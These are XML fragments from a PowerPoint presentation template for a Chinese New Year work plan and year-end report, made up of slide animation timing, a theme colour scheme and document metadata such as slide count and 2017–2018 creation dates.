                                            <p:strVal val="4*#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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自定义 38">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="323232"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="E3DED1"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="17307F"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="924998"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="17307F"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="924998"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="17307F"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="C19859"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="6B9F25"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="B26B02"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="qi1prs1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8347</TotalTime>
  <Words>4633</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>719</Paragraphs>
  <Slides>133</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133</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="141" baseType="lpstr">
      <vt:lpstr>Menlo</vt:lpstr>
      <vt:lpstr>PingFang SC</vt:lpstr>
      <vt:lpstr>等线</vt:lpstr>
      <vt:lpstr>微软雅黑</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筑梦远航新年工作计划年终汇报PPT模板</dc:title>
  <dc:creator>Microsoft</dc:creator>
  <cp:lastModifiedBy>hp</cp:lastModifiedBy>
  <cp:revision>519</cp:revision>
  <cp:lastPrinted>2018-08-04T18:00:04Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-12-29T01:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-08-06T02:33:22Z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